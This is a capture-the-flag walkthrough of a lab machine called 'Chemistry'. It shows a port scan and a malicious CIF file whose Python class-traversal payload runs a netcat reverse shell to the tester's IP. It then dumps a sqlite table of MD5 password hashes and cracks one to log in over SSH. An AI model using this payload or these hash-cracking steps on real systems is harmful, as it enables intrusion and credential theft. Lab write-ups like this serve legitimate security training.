Chemistry

Season 6 Machine

Nmap scan shows port 22 and port 5000 is open:

┌──(kali㉿DESKTOP-2TPMHIH)-[~]
└─$ nmap -Pn -sV 10.129.160.217 -p- --min-rate 1000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-19 22:55 CEST
Warning: 10.129.160.217 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.160.217
Host is up (0.030s latency).
Not shown: 65274 closed tcp ports (conn-refused), 259 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
5000/tcp open  upnp?

If we browse to the IP on port 5000 we find a web tool called 'Chemistry CIF Analyzer' which has a Login and Register page.

I'll try creating a user called 'test' with password 'password' and we're presented with a dashboard with the possibility of downloading an example CIF file

I found this vulnerability after searching for a while and after fiddling around with the payload and the example CIF file I eventually got it working and below you can see the malicious CIF file.

data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1
_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("busybox nc 10.10.14.192 4444 -e /bin/bash");0,0,0'

_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

If you upload this and 'View' the file while listening on port 4444 you'll get a reverse shell.

Looking around the file system we can see the user flag is in /home/rosa/user.txt but we don't have permission to read that as the 'app' user. Instead let's look through the source code for the app and see if we can find anything useful.

While looking at the code we see that it's a flask app that uses a sqlite database.

$ sqlite3 database.db
sqlite3 database.db
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
sqlite> .tables
.tables
structure  user     
sqlite> select * from user;
select * from user;
1|admin|2861debaf8d99436a10ed6f75a252abf
2|app|197865e46b878d9e74a0346b6d59886a
3|rosa|63ed86ee9f624c7b14f1d4f43dc251a5
4|robert|02fcf7cfc10adc37959fb21f06c6b467
5|jobert|3dec299e06f7ed187bac06bd3b670ab2
6|carlos|9ad48828b0955513f7cf0f7f6510c8f8
7|peter|6845c17d298d95aa942127bdad2ceb9b
8|victoria|c3601ad2286a4293868ec2a4bc606ba3
9|tania|a4aa55e816205dc0389591c9f82f43bb
10|eusebio|6cad48078d0241cca9a7b322ecd073b3
11|gelacia|4af70c80b68267012ecdac9a7e916d18
12|fabian|4e5d71f53fdd2eabdbabb233113b5dc0
13|axel|9347f9724ca083b17e39555c36fd9007
14|kristel|6896ba7b11a62cacffbdaded457c6d92
15|guest|084e0343a0486ff05530df6c705c8bb4

Grabbing the MD5 hash for rosa and checking that on CrackStation reveals the password to us and we can now SSH as rosa with her password and grab the user flag. ✅

PreviousCicada NextPlanning

Last updated 1 year ago